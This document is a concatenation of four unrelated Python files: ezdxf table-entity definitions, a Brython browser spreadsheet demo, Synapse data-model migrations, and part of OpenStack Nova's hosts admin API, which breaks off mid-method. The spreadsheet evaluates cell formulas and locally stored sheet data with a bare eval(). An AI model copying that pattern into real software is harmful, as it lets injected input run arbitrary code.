# 1 = text type
# 2 = block type
# 172: Cell flag value; this value is repeated, 1 value per cell
# 173: Cell merged value; this value is repeated, 1 value per cell
# 174: Boolean flag indicating if the autofit option is set for the
# cell; this value is repeated, 1 value per cell
# 175: Cell border width (applicable only for merged cells); this
# value is repeated, 1 value per cell
# 176: Cell border height (applicable for merged cells); this value
# is repeated, 1 value per cell
# 91: Cell override flag; this value is repeated, 1 value per cell
# (from AutoCAD 2007)
# 178: Flag value for a virtual edge
# 145: Rotation value (real; applicable for a block-type cell and
# a text-type cell)
# 344: Hard pointer ID of the FIELD object. This applies only to a
# text-type cell. If the text in the cell contains one or more
# fields, only the ID of the FIELD object is saved.
# The text string (group codes 1 and 3) is ignored
# 1: Text string in a cell. If the string is shorter than 250
# characters, all characters appear in code 1.
# If the string is longer than 250 characters, it is divided
# into chunks of 250 characters.
# The chunks are contained in one or more code 2 codes.
# If code 2 codes are used, the last group is a code 1 and is
# shorter than 250 characters.
# This value applies only to text-type cells and is repeated,
# 1 value per cell
# 2: Text string in a cell, in 250-character chunks; optional.
# This value applies only to text-type cells and is repeated,
# 1 value per cell
# 340: Hard-pointer ID of the block table record.
# This value applies only to block-type cells and is repeated,
# 1 value per cell
# 144: Block scale (real). This value applies only to block-type
# cells and is repeated, 1 value per cell
# 176: Number of attribute definitions in the block table record
# (applicable only to a block-type cell)
# for every ATTDEF:
# 331: Soft pointer ID of the attribute definition in the
# block table record, referenced by group code 179
# (applicable only for a block-type cell). This value is
# repeated once per attribute definition
# 300: Text string value for an attribute definition, repeated
# once per attribute definition and applicable only for
# a block-type cell
# 7: Text style name (string); override applied at the cell level
# 140: Text height value; override applied at the cell level
# 170: Cell alignment value; override applied at the cell level
# 64: Value for the color of cell content; override applied at the
# cell level
# 63: Value for the background (fill) color of cell content;
# override applied at the cell level
# 69: True color value for the top border of the cell;
# override applied at the cell level
# 65: True color value for the right border of the cell;
# override applied at the cell level
# 66: True color value for the bottom border of the cell;
# override applied at the cell level
# 68: True color value for the left border of the cell;
# override applied at the cell level
# 279: Lineweight for the top border of the cell;
# override applied at the cell level
# 275: Lineweight for the right border of the cell;
# override applied at the cell level
# 276: Lineweight for the bottom border of the cell;
# override applied at the cell level
# 278: Lineweight for the left border of the cell;
# override applied at the cell level
# 283: Boolean flag for whether the fill color is on;
# override applied at the cell level
# 289: Boolean flag for the visibility of the top border of the cell;
# override applied at the cell level
# 285: Boolean flag for the visibility of the right border of the cell;
# override applied at the cell level
# 286: Boolean flag for the visibility of the bottom border of the cell;
# override applied at the cell level
# 288: Boolean flag for the visibility of the left border of the cell;
# override applied at the cell level
# 70: Flow direction;
# override applied at the table entity level
# 40: Horizontal cell margin;
# override applied at the table entity level
# 41: Vertical cell margin;
# override applied at the table entity level
# 280: Flag for whether the title is suppressed;
# override applied at the table entity level
# 281: Flag for whether the header row is suppressed;
# override applied at the table entity level
# 7: Text style name (string);
# override applied at the table entity level.
# There may be one entry for each cell type
# 140: Text height (real);
# override applied at the table entity level.
# There may be one entry for each cell type
# 170: Cell alignment (integer);
# override applied at the table entity level.
# There may be one entry for each cell type
# 63: Color value for cell background or for the vertical, left
# border of the table; override applied at the table entity
# level. There may be one entry for each cell type
# 64: Color value for cell content or for the horizontal, top
# border of the table; override applied at the table entity
# level. There may be one entry for each cell type
# 65: Color value for the horizontal, inside border lines;
# override applied at the table entity level
# 66: Color value for the horizontal, bottom border lines;
# override applied at the table entity level
# 68: Color value for the vertical, inside border lines;
# override applied at the table entity level
# 69: Color value for the vertical, right border lines;
# override applied at the table entity level
# 283: Flag for whether background color is enabled (default = 0);
# override applied at the table entity level.
# There may be one entry for each cell type: 0/1 = Disabled/Enabled
# 274-279: Lineweight for each border type of the cell (default = kLnWtByBlock);
# override applied at the table entity level.
# There may be one group for each cell type
# 284-289: Flag for visibility of each border type of the cell (default = 1);
# override applied at the table entity level.
# There may be one group for each cell type: 0/1 = Invisible/Visible
# 97: Standard/title/header row data type
# 98: Standard/title/header row unit type
# 4: Standard/title/header row format string
#
# AutoCAD 2007 and before:
# 177: Cell override flag value (before AutoCAD 2007)
# 92: Extended cell flags (from AutoCAD 2007), COLLISION: group code
# also used by n_cols
# 301: Text string in a cell. If the string is shorter than 250
# characters, all characters appear in code 302.
# If the string is longer than 250 characters, it is divided into
# chunks of 250 characters.
# The chunks are contained in one or more code 303 codes.
# If code 303 codes are used, the last group is a code 301 and is
# shorter than 250 characters.
# This value applies only to text-type cells and is repeated,
# 1 value per cell (from AutoCAD 2007)
# 302: Text string in a cell, in 250-character chunks; optional.
# This value applies only to text-type cells and is repeated,
# 1 value per cell (from AutoCAD 2007)
#
# REMARK from Autodesk:
# Group code 178 is a flag value for a virtual edge. A virtual edge is
# used when a grid line is shared by two cells.
# For example, if a table contains one row and two columns and it
# contains cell A and cell B, the central grid line
# contains the right edge of cell A and the left edge of cell B.
# One edge is real, and the other edge is virtual.
# The virtual edge points to the real edge; both edges have the same
# set of properties, including color, lineweight, and visibility.
},
)
acdb_table_group_codes = group_code_mapping(acdb_table)
# todo: implement ACAD_TABLE
class AcadTable(DXFGraphic):
"""DXF ACAD_TABLE entity"""
DXFTYPE = "ACAD_TABLE"
DXFATTRIBS = DXFAttributes(
base_class, acdb_entity, acdb_block_reference, acdb_table
)
MIN_DXF_VERSION_FOR_EXPORT = const.DXF2007
def __init__(self):
super().__init__()
self.data = None
def _copy_data(self, entity: "DXFEntity") -> None:
"""Copy data."""
assert isinstance(entity, AcadTable)
entity.data = copy.deepcopy(self.data)
def load_dxf_attribs(
self, processor: SubclassProcessor = None
) -> "DXFNamespace":
dxf = super().load_dxf_attribs(processor)
if processor:
processor.fast_load_dxfattribs(
dxf, acdb_block_reference_group_codes, subclass=2
)
tags = processor.fast_load_dxfattribs(
dxf, acdb_table_group_codes, subclass=3, log=False
)
self.load_table(tags)
return dxf
def load_table(self, tags: "Tags"):
pass
def export_entity(self, tagwriter: "TagWriter") -> None:
"""Export entity specific data as DXF tags."""
super().export_entity(tagwriter)
tagwriter.write_tag2(const.SUBCLASS_MARKER, acdb_block_reference.name)
self.dxf.export_dxf_attribs(tagwriter, ["geometry", "insert"])
tagwriter.write_tag2(const.SUBCLASS_MARKER, acdb_table.name)
self.export_table(tagwriter)
def export_table(self, tagwriter: "TagWriter"):
pass
def __referenced_blocks__(self) -> Iterable[str]:
"""Support for "ReferencedBlocks" protocol."""
if self.doc:
block_record_handle = self.dxf.get("block_record_handle", None)
if block_record_handle:
return (block_record_handle,)
return tuple()
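# Illustrative sketch only (load_table()/export_table() above are still stubs and
# this helper is not part of the library): the group-code layout documented in
# acdb_table suggests how the flat tag stream could be split up. The helper assumes
# tags are available as plain (code, value) pairs; names and structure are this
# sketch's own, not the library's API.
def _collect_table_geometry(tags):
    """Collect row heights (code 141) and per-column values (code 142) from an
    iterable of (code, value) pairs, preserving their order of appearance."""
    row_heights = []
    col_values = []
    for code, value in tags:
        if code == 141:
            row_heights.append(value)
        elif code == 142:
            col_values.append(value)
    return row_heights, col_values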
acdb_table_style = DefSubclass(
"AcDbTableStyle",
{
# Table style version: 0 = 2010
"version": DXFAttr(280),
# Table style description (string; 255 characters maximum):
"name": DXFAttr(3),
# FlowDirection (integer):
# 0 = Down
# 1 = Up
"flow_direction": DXFAttr(7),
# Flags (bit-coded)
"flags": DXFAttr(7),
# Horizontal cell margin (real; default = 0.06)
"horizontal_cell_margin": DXFAttr(40),
# Vertical cell margin (real; default = 0.06)
"vertical_cell_margin": DXFAttr(41),
# Flag for whether the title is suppressed:
# 0/1 = not suppressed/suppressed
"suppress_title": DXFAttr(280),
# Flag for whether the column heading is suppressed:
# 0/1 = not suppressed/suppressed
"suppress_column_header": DXFAttr(281),
# The following group codes are repeated for every cell in the table
# 7: Text style name (string; default = STANDARD)
# 140: Text height (real)
# 170: Cell alignment (integer)
# 62: Text color (integer; default = BYBLOCK)
# 63: Cell fill color (integer; default = 7)
# 283: Flag for whether background color is enabled (default = 0):
# 0/1 = disabled/enabled
# 90: Cell data type
# 91: Cell unit type
# 274-279: Lineweight associated with each border type of the cell
# (default = kLnWtByBlock)
# 284-289: Flag for visibility associated with each border type of the cell
# (default = 1): 0/1 = Invisible/Visible
# 64-69: Color value associated with each border type of the cell
# (default = BYBLOCK)
},
)
# todo: implement TABLESTYLE
class TableStyle(DXFObject):
"""DXF TABLESTYLE entity
Every ACAD_TABLE has its own table style.
Requires DXF version AC1021/R2007
"""
DXFTYPE = "TABLESTYLE"
DXFATTRIBS = DXFAttributes(base_class, acdb_table_style)
MIN_DXF_VERSION_FOR_EXPORT = const.DXF2007
class TableStyleManager(ObjectCollection):
def __init__(self, doc: "Drawing"):
super().__init__(
doc, dict_name="ACAD_TABLESTYLE", object_type="TABLESTYLE"
)
|
|
from browser import document, html, alert, local_storage
import json
import ui
storage = local_storage.storage
current_cell = None
current_cell_info = None
def entry_keydown(ev):
global current_cell
_input = ev.target
cell = _input.parent
is_arrow = ev.keyCode in [9, #tab
37, # left
39, # right
38, #up
40, #down
13 # CR
]
if is_arrow:
update(cell)
current_cell = None
move_sel(ev)
#document.bind('keydown', doc_keydown)
elif ev.keyCode == 27: # escape
update_current(cell.info['entry'])
cell.remove(_input)
cell.text = cell.value
current_cell = None
#document.bind('keydown', doc_keydown)
ev.stopPropagation()
def entry_keyup(ev):
update_current(current_cell.get(selector='INPUT')[0].value)
def update_current(data):
document['current'].value = data
def entry_click(ev):
ev.stopPropagation()
# callbacks for cell editor
def enter_editor(ev):
make_input(selected)
ev.target.focus()
current_cell.get(selector='INPUT')[0].value = ev.target.value
ev.stopPropagation()
def editor_keydown(ev):
ev.stopPropagation()
def update_from_editor(ev):
global current_cell
current_cell.get(selector='INPUT')[0].value = ev.target.value
if ev.keyCode == 13: # CR
update(current_cell)
current_cell = None
ev.target.blur()
elif ev.keyCode == 27: # escape
update_current(current_cell.info['entry'])
current_cell.clear()
current_cell.text = current_cell.value
current_cell = None
ev.target.blur()
ev.stopPropagation()
selected = None
def update(cell):
# update the table, based on the last entry in specified cell
content = cell.get(selector='INPUT')[0].value
cell.info['entry'] = content
if content.startswith('='):
cell.text = eval(content[1:])
else:
cell.text = content
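# Illustrative example of the behaviour above (not part of the original code):
# typing "=2+3" into a cell keeps the raw entry "=2+3" in cell.info['entry'] while
# the displayed cell text becomes 5, because everything after the leading '=' is
# passed to eval(); plain entries such as "hello" are shown verbatim.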
def doc_keydown(ev):
is_arrow = ev.keyCode in [9, #tab
37, # left
39, # right
38, #up
40, #down
13 # CR
]
if is_arrow:
move_sel(ev)
elif ev.keyCode != 0:
make_input(selected)
def move_sel(ev):
cell = selected
row = cell.parent
cell_num = row.children.index(cell)
row_num = row.parent.children.index(row)
# jump to next cell
if ev.keyCode==39 or (ev.keyCode==9 and not ev.shiftKey) or ev.keyCode==13:
if cell_num<len(row.children)-1:
next_cell = row.children[cell_num+1]
mark_selected(next_cell)
elif ev.keyCode==37 or (ev.keyCode==9 and ev.shiftKey):
if cell_num>1:
next_cell = row.children[cell_num-1]
mark_selected(next_cell)
elif ev.keyCode == 40:
if row_num<len(row.parent.children)-1:
next_cell = row.parent.children[row_num+1].children[cell_num]
mark_selected(next_cell)
elif ev.keyCode == 38:
if row_num>1:
next_cell = row.parent.children[row_num-1].children[cell_num]
mark_selected(next_cell)
ev.preventDefault()
ev.stopPropagation()
def select(ev):
global current_cell
if current_cell is not None:
update(current_cell)
current_cell = None
mark_selected(ev.target)
def mark_selected(cell):
global selected
if selected is not None:
selected.style.borderColor = '#000'
selected.style.borderWidth = '1px'
cell.style.borderColor = 'blue'
cell.style.borderWidth = '2px'
selected = cell
update_current(cell.info['entry'])
def deselect():
global selected
if selected is not None:
selected.style.borderColor = '#000'
selected.style.borderWidth = '1px'
selected = None
def entry(ev):
make_input(ev.target, True)
def make_input(cell, keep_value=False):
global current_cell
if current_cell is not None:
value = current_cell.get(selector='INPUT')[0].value
current_cell.clear()
current_cell.text = value
value = cell.text.strip()
# save value in case editing the cell is aborted by Escape
cell.value = cell.text
cell.clear()
_input = html.INPUT(style={'padding':'0px'})
if keep_value:
_input.value = cell.info['entry']
_input.style.width = '%spx' %100
cell <= _input
_input.bind('keydown', entry_keydown)
_input.bind('keyup', entry_keyup)
_input.bind('click', entry_click)
document['current'].value = cell.info['entry']
_input.focus()
current_cell = cell
mark_selected(cell)
# Functions to open/save spreadsheets
prefix = 'brython_spreadsheet'
def sheet_names():
return [ name[len(prefix):] for name in storage.keys()
if name.startswith(prefix)]
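# Illustrative example: saving a sheet named "budget" stores it under the
# local_storage key "brython_spreadsheetbudget" (see save_sheet_content below),
# so sheet_names() would then return ["budget"].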
def select_sheet(ev):
names = sheet_names()
names.sort()
if names:
d = ui.Dialog("Open sheet...")
d.add_ok_cancel(ok=open_sheet)
d.body <= html.SPAN('File', style=dict(marginRight='10px'))
d.body <= html.SELECT(html.OPTION(name) for name in names)
else:
d = ui.Dialog("Error")
d.body <= "No sheet found"
document <= d
def open_sheet(dialog):
select = dialog.get(selector='select')[0]
print(select)
dialog.close()
sheet_name = select.options[select.selectedIndex].value
data = json.loads(storage['brython_spreadsheet%s' %sheet_name])
print(data)
document['panel'].clear()
load(sheet_name)
cells = []
for row in document['sheet_table'].get(selector='TR')[1:]:
cells.append([])
for cell in row.get(selector='TD'):
cells[-1].append(cell)
for row, column, entry in data:
cell = cells[row][column]
cell.info = {'entry':entry}
if not entry.startswith('='):
cell.text = entry
else:
cell.text = eval(entry[1:])
def save_as(ev):
d = ui.Dialog("Save sheet as...")
d.add_ok_cancel(ok=save_sheet, cancel=cancel_save_as)
d.body <= html.SPAN('File name', style=dict(marginRight='10px'))
d.body <= html.INPUT()
document.unbind('keydown')
document <= d
def cancel_save_as(dialog):
document.bind('keydown', doc_keydown)
dialog.close()
def confirm_override(widget):
save_sheet_content(widget.sheet_name)
def save_sheet(dialog):
document.bind('keydown', doc_keydown)
sheet_name = dialog.get(selector='input')[0].value
if not sheet_name.strip():
d = ui.dialog.Dialog()
d.set_title("Error")
d.set_body("No sheet name provided")
return
if sheet_name in sheet_names():
d = ui.dialog.YesNoDialog("Save sheet",
"A sheet named %s already exists. Override ?" %sheet_name,
confirm_override,
None)
d.sheet_name = sheet_name
return
save_sheet_content(sheet_name)
def save_sheet_content(sheet_name):
info = []
table = document['sheet_table']
for i,row in enumerate(table.get(selector="TR")[1:]):
print(row)
for j, cell in enumerate(row.get(selector='TD')):
if cell.info['entry']:
info.append([i, j, cell.info['entry']])
storage['brython_spreadsheet%s' %sheet_name] = json.dumps(info)
document['sheet_name'].text = sheet_name
current_menu = None
def stop_menu(*args):
global current_menu
if current_menu:
current_menu.close()
current_menu = None
document.bind('keydown', doc_keydown)
document.bind('click', stop_menu)
menu_file = None
def load(sheet_name=None):
global current_cell_info,menu_file
if sheet_name is None:
sheet_name = 'New document'
panel = document['panel']
title = html.DIV(style=dict(width='auto'))
title <= html.H2(sheet_name, id="sheet_name")
panel <= title
menu = ui.Menu()
menu_file = menu.add('File')
menu_file.add('New', None)
menu_file.add('Open...', select_sheet)
menu_file.add('Save as...', save_as)
panel <= html.SPAN(menu)
panel <= html.BR()
cell_editor = html.INPUT(style=dict(width="200px"), Id="current")
cell_editor.bind('click', enter_editor)
cell_editor.bind('keydown', editor_keydown)
cell_editor.bind('keyup', update_from_editor)
panel <= cell_editor
t = html.TABLE(Id="sheet_table")
srow = -1
rows, cols = 20, 20
    col_widths = [100 for i in range(cols)]
line = html.TR()
line <= html.TH()
for i in range(cols):
col_name = chr(65+i)
line <= html.TH(col_name, style={'min-width':'%spx' %col_widths[i]})
t <= line
for i in range(rows*cols):
row, column = divmod(i, cols)
if row>srow:
line = html.TR()
line <= html.TH(row+1)
t <= line
srow = row
cell = html.TD('',id='c%s_%s' %(row,column),style=dict(padding='2px'))
cell.bind('click', select)
cell.bind('dblclick', entry)
cell.info = {'entry':''}
line <= cell
panel <= html.DIV(t,style=dict(float='left'))
mark_selected(t.get(selector='TD')[0])
load()
|
|
import logging
import synapse.common as s_common
import synapse.lib.tufo as s_tufo
import synapse.lib.module as s_module
logger = logging.getLogger(__name__)
class SynMod(s_module.CoreModule):
@staticmethod
def getBaseModels():
modl = {
'types': (
('syn:splice', {'subof': 'guid'}),
('syn:tagform', {'subof': 'comp', 'fields': 'tag,syn:tag|form,syn:prop', 'ex': '(foo.bar,baz:faz)'}),
('syn:alias', {'subof': 'str', 'regex': r'^\$[a-z_]+$',
'doc': 'A synapse guid alias', 'ex': '$visi'}),
('syn:ingest', {'subof': 'str:lwr'}),
('syn:log', {'subof': 'guid'}),
),
'forms': (
('syn:splice', {'local': 1}, (
('act', {'ptype': 'str:lwr'}),
('time', {'ptype': 'time'}),
('node', {'ptype': 'guid'}),
('user', {'ptype': 'str:lwr'}),
('tag', {'ptype': 'str:lwr'}),
('form', {'ptype': 'str:lwr'}),
('valu', {'ptype': 'str:lwr'}),
)),
('syn:alias', {'local': 1}, (
('iden', {'ptype': 'guid', 'defval': '*',
'doc': 'The GUID for the given alias name'}),
)),
('syn:trigger', {'ptype': 'guid', 'local': 1}, (
('en', {'ptype': 'bool', 'defval': 0, 'doc': 'Is the trigger currently enabled'}),
('on', {'ptype': 'syn:perm'}),
('run', {'ptype': 'syn:storm'}),
('user', {'ptype': 'str'}),
)),
('syn:core', {'doc': 'A node representing a unique Cortex'}, ()),
('syn:form', {'doc': 'The base form type.'}, (
('doc', {'ptype': 'str', 'doc': 'basic form definition'}),
('ver', {'ptype': 'int', 'doc': 'form version within the model'}),
('model', {'ptype': 'str', 'doc': 'which model defines a given form'}),
('ptype', {'ptype': 'syn:type', 'doc': 'Synapse type for this form'}),
('local', {'ptype': 'bool', 'defval': 0,
'doc': 'Flag used to determine if a form should not be included in splices'}),
)),
('syn:prop', {'doc': 'The base property type.'}, (
('doc', {'ptype': 'str', 'doc': 'Description of the property definition.'}),
('title', {'ptype': 'str', 'doc': 'A short description of the property definition.'}),
('form', {'ptype': 'syn:prop', 'doc': 'The form of the property.'}),
('ptype', {'ptype': 'syn:type', 'doc': 'Synapse type for this field'}),
('req', {'ptype': 'bool', 'doc': 'Set to 1 if this property is required to form the node.'}),
('relname', {'ptype': 'str', 'doc': 'Relative name of the property'}),
('base', {'ptype': 'str', 'doc': 'Base name of the property'}),
('glob', {'ptype': 'bool', 'defval': 0, 'doc': 'Set to 1 if this property defines a glob'}),
('defval', {'doc': 'Set to the default value for this property', 'glob': 1}),
('univ', {'ptype': 'bool',
'doc': 'Specifies if a prop is universal and has no form associated with it.'}),
)),
('syn:type', {'doc': 'The base type type.'}, (
('ctor', {'ptype': 'str', 'doc': 'Python path to the class used to instantiate the type.'}),
('subof', {'ptype': 'syn:type', 'doc': 'Type which this inherits from.'}),
('*', {'glob': 1})
)),
('syn:tag', {'doc': 'The base form for a synapse tag.'}, (
('up', {'ptype': 'syn:tag', 'doc': ''}),
('doc', {'ptype': 'str', 'defval': '', }),
('depth', {'ptype': 'int', 'doc': 'How deep the tag is in the hierarchy', 'defval': 0}),
('title', {'ptype': 'str', 'doc': '', 'defval': ''}),
('base', {'ptype': 'str', 'doc': '', 'ro': 1}),
)),
('syn:tagform', {'doc': 'A node describing the meaning of a tag on a specific form'}, (
('tag', {'ptype': 'syn:tag', 'doc': 'The tag being documented', 'ro': 1}),
('form', {'ptype': 'syn:prop', 'doc': 'The form that the tag applies to', 'ro': 1}),
('doc', {'ptype': 'str:txt', 'defval': '??',
'doc': 'The long form description for what the tag means on the given node form'}),
('title', {'ptype': 'str:txt', 'defval': '??',
'doc': 'The short name for what the tag means on the given node form'}),
)),
('syn:model', {'ptype': 'str', 'doc': 'prefix for all forms within the model'}, (
('hash', {'ptype': 'guid', 'doc': 'version hash for the current model'}),
('prefix', {'ptype': 'syn:prop', 'doc': 'Prefix used by the types/forms in the model'}),
)),
('syn:seq', {'ptype': 'str:lwr', 'doc': 'A sequential id generation tracker'}, (
('width', {'ptype': 'int', 'defval': 0, 'doc': 'How many digits to use to represent the number'}),
('nextvalu', {'ptype': 'int', 'defval': 0, 'doc': 'The next sequential value'}),
)),
('syn:ingest', {'ptype': 'syn:ingest', 'local': 1}, (
('time', {'ptype': 'time'}),
('text', {'ptype': 'json'})
)),
('syn:log', {'ptype': 'guid', 'local': 1}, (
('subsys', {'ptype': 'str', 'defval': '??',
'doc': 'Named subsystem which originated the log event'}),
('level', {'ptype': 'int', 'defval': logging.WARNING, }),
('time', {'ptype': 'time', 'doc': 'When the log event occurred'}),
('exc', {'ptype': 'str', 'doc': 'Exception class name if caused by an exception'}),
('info:*', {'glob': 1})
)),
)
}
name = 'syn'
return ((name, modl),)
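    # Illustrative note (not part of the original module): each entry in the
    # 'forms' tuple above follows the pattern (form_name, form_info, props), where
    # props is a tuple of (prop_name, prop_info) pairs. For example 'syn:splice'
    # is declared with {'local': 1} and secondary props such as
    # ('time', {'ptype': 'time'}), which appears on a node as the full property
    # name 'syn:splice:time'.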
@s_module.modelrev('syn', 201709051630)
def _delOldModelNodes(self):
types = self.core.getRowsByProp('syn:type')
forms = self.core.getRowsByProp('syn:form')
props = self.core.getRowsByProp('syn:prop')
syncore = self.core.getRowsByProp('.:modl:vers:syn:core')
with self.core.getCoreXact():
[self.core.delRowsById(r[0]) for r in types]
[self.core.delRowsById(r[0]) for r in forms]
[self.core.delRowsById(r[0]) for r in props]
[self.core.delRowsById(r[0]) for r in syncore]
@s_module.modelrev('syn', 201709191412)
def _revModl201709191412(self):
'''
Migrate the XREF types to use the propvalu syntax.
'''
tick = s_common.now()
adds = []
dels = set()
nforms = set()
for form in self.core.getModelDict().get('forms'):
sforms = self.core.getTypeOfs(form)
if 'xref' in sforms:
nforms.add(form)
for ntyp in nforms:
nodes = self.core.getTufosByProp(ntyp)
xtyp = '{}:xtype'.format(ntyp)
xrefp = '{}:xref'.format(ntyp)
xrefpint = '{}:xref:intval'.format(ntyp)
xrefpstr = '{}:xref:strval'.format(ntyp)
xrefprop = '{}:xref:prop'.format(ntyp)
for node in nodes:
iden = node[0]
srcvtype = node[1].get(xtyp)
if srcvtype is None:
# This is expensive node level introspection :(
for prop, valu in s_tufo.props(node).items():
if prop.startswith('xref:'):
form = prop.split('xref:', 1)[1]
if self.core.isTufoForm(form):
srcvtype = form
break
if not srcvtype:
raise s_common.NoSuchProp(iden=node[0], type=ntyp,
mesg='Unable to find a xref prop which is a form for migrating a '
'XREF node.')
srcprp = '{}:xref:{}'.format(ntyp, srcvtype)
srcv = node[1].get(srcprp)
valu, subs = self.core.getPropNorm(xrefp, [srcvtype, srcv])
adds.append((iden, xrefp, valu, tick))
adds.append((iden, xrefprop, srcvtype, tick))
if 'intval' in subs:
adds.append((iden, xrefpint, subs.get('intval'), tick))
else:
adds.append((iden, xrefpstr, subs.get('strval'), tick))
dels.add(srcprp)
dels.add(xtyp)
with self.core.getCoreXact():
self.core.addRows(adds)
for prop in dels:
self.core.delRowsByProp(prop)
@s_module.modelrev('syn', 201710191144)
def _revModl201710191144(self):
with self.core.getCoreXact():
now = s_common.now()
adds = []
logger.debug('Lifting tufo:form rows')
for i, _, v, t in self.core.store.getRowsByProp('tufo:form'):
adds.append((i, 'node:created', t, now),)
logger.debug('Deleting existing node:created rows')
self.core.store.delRowsByProp('node:created')
if adds:
tot = len(adds)
logger.debug('Adding {:,d} node:created rows'.format(tot))
i = 0
n = 100000
for chunk in s_common.chunks(adds, n):
self.core.store.addRows(chunk)
i = i + len(chunk)
logger.debug('Loading {:,d} [{}%] rows into transaction'.format(i, int((i / tot) * 100)))
logger.debug('Finished adding node:created rows to the Cortex')
@s_module.modelrev('syn', 201711012123)
def _revModl201711012123(self):
now = s_common.now()
forms = sorted(self.core.getTufoForms())
nforms = len(forms)
for n, form in enumerate(forms):
adds = []
logger.debug('Computing node:ndef rows for [{}]'.format(form))
for i, p, v, t in self.core.store.getRowsByProp(form):
# This is quicker than going through the norm process
nv = s_common.guid((p, v))
adds.append((i, 'node:ndef', nv, now))
if adds:
tot = len(adds)
logger.debug('Adding {:,d} node:ndef rows for [{}]'.format(tot, form))
with self.core.getCoreXact() as xact:
i = 0
nt = 100000
for chunk in s_common.chunks(adds, nt):
self.core.store.addRows(chunk)
i = i + len(chunk)
logger.debug('Loading {:,d} [{}%] rows into transaction'.format(i, int((i / tot) * 100)))
logger.debug('Processed {:,d} [{}%] forms.'.format(n, int((n / nforms) * 100)))
logger.debug('Finished adding node:ndef rows to the Cortex')
|
|
# Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The hosts admin extension."""
from oslo_log import log as logging
import six
import webob.exc
from nova.api.openstack import extensions
from nova import compute
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LI
from nova import objects
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'hosts')
class HostController(object):
"""The Hosts API controller for the OpenStack API."""
def __init__(self):
self.api = compute.HostAPI()
super(HostController, self).__init__()
def index(self, req):
"""Returns a dict in the format:
| {'hosts': [{'host_name': 'some.host.name',
| 'service': 'cells',
| 'zone': 'internal'},
| {'host_name': 'some.other.host.name',
| 'service': 'cells',
| 'zone': 'internal'},
| {'host_name': 'some.celly.host.name',
| 'service': 'cells',
| 'zone': 'internal'},
| {'host_name': 'console1.host.com',
| 'service': 'consoleauth',
| 'zone': 'internal'},
| {'host_name': 'network1.host.com',
| 'service': 'network',
| 'zone': 'internal'},
| {'host_name': 'network2.host.com',
| 'service': 'network',
| 'zone': 'internal'},
| {'host_name': 'compute1.host.com',
| 'service': 'compute',
| 'zone': 'nova'},
| {'host_name': 'compute2.host.com',
| 'service': 'compute',
| 'zone': 'nova'},
| {'host_name': 'sched1.host.com',
| 'service': 'scheduler',
| 'zone': 'internal'},
| {'host_name': 'sched2.host.com',
| 'service': 'scheduler',
| 'zone': 'internal'},
| {'host_name': 'vol1.host.com',
| 'service': 'volume',
| 'zone': 'internal'}]}
"""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks
nova_context.require_admin_context(context)
filters = {'disabled': False}
zone = req.GET.get('zone', None)
if zone:
filters['availability_zone'] = zone
services = self.api.service_get_all(context, filters=filters,
set_zones=True)
hosts = []
api_services = ('nova-osapi_compute', 'nova-ec2', 'nova-metadata')
for service in services:
if service.binary not in api_services:
hosts.append({'host_name': service['host'],
'service': service['topic'],
'zone': service['availability_zone']})
return {'hosts': hosts}
def update(self, req, id, body):
"""Updates a specified body.
:param body: example format {'status': 'enable',
'maintenance_mode': 'enable'}
"""
def read_enabled(orig_val, msg):
"""Checks a specified orig_val and returns True for 'enabled'
and False for 'disabled'.
:param orig_val: A string with either 'enable' or 'disable'. May
be surrounded by whitespace, and case doesn't
matter
:param msg: The message to be passed to HTTPBadRequest. A single
%s will be replaced with orig_val.
"""
val = orig_val.strip().lower()
if val == "enable":
return True
elif val == "disable":
return False
else:
raise webob.exc.HTTPBadRequest(explanation=msg % orig_val)
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks. This has to be left only for API v2.0 because
# this version has to be stable even if it means that only admins
# can call this method while the policy could be changed.
nova_context.require_admin_context(context)
# See what the user wants to 'update'
params = {k.strip().lower(): v for k, v in six.iteritems(body)}
orig_status = status = params.pop('status', None)
orig_maint_mode = maint_mode = params.pop('maintenance_mode', None)
# Validate the request
if len(params) > 0:
# Some extra param was passed. Fail.
explanation = _("Invalid update setting: '%s'") % list(
params.keys())[0]
raise webob.exc.HTTPBadRequest(explanation=explanation)
if orig_status is not None:
status = read_enabled(orig_status, _("Invalid status: '%s'"))
if orig_maint_mode is not None:
maint_mode = read_enabled(orig_maint_mode, _("Invalid mode: '%s'"))
if status is None and maint_mode is None:
explanation = _("'status' or 'maintenance_mode' needed for "
"host update")
raise webob.exc.HTTPBadRequest(explanation=explanation)
# Make the calls and merge the results
result = {'host': id}
if status is not None:
result['status'] = self._set_enabled_status(context, id, status)
if maint_mode is not None:
result['maintenance_mode'] = self._set_host_maintenance(context,
id, maint_mode)
return result
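    # Illustrative example of the shapes handled above (assumed, not from the
    # original source): a request body of
    #     {'status': 'enable', 'maintenance_mode': 'disable'}
    # would produce a result such as
    #     {'host': <id>, 'status': 'enabled', 'maintenance_mode': 'off_maintenance'}
    # where the exact strings come from the compute API calls below.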
def _set_host_maintenance(self, context, host_name, mode=True):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation.
"""
LOG.info(_LI("Putting host %(host_name)s in maintenance mode "
"%(mode)s."),
{'host_name': host_name, 'mode': mode})
try:
result = self.api.set_host_maintenance(context, host_name, mode)
except NotImplementedError:
msg = _("Virt driver does not implement host maintenance mode.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
if result not in ("on_maintenance", "off_maintenance"):
raise webob.exc.HTTPBadRequest(explanation=result)
return result
def _set_enabled_status(self, context, host_name, enabled):
"""Sets the specified host's ability to accept new instances.
:param enabled: a boolean - if False no new VMs will be able to start
on the host
"""
if enabled:
LOG.info(_LI("Enabling host %s."), host_name)
else:
LOG.info(_LI("Disabling host %s."), host_name)
try:
result = self.api.set_host_enabled(context, host_name=host_name,
enabled=enabled)
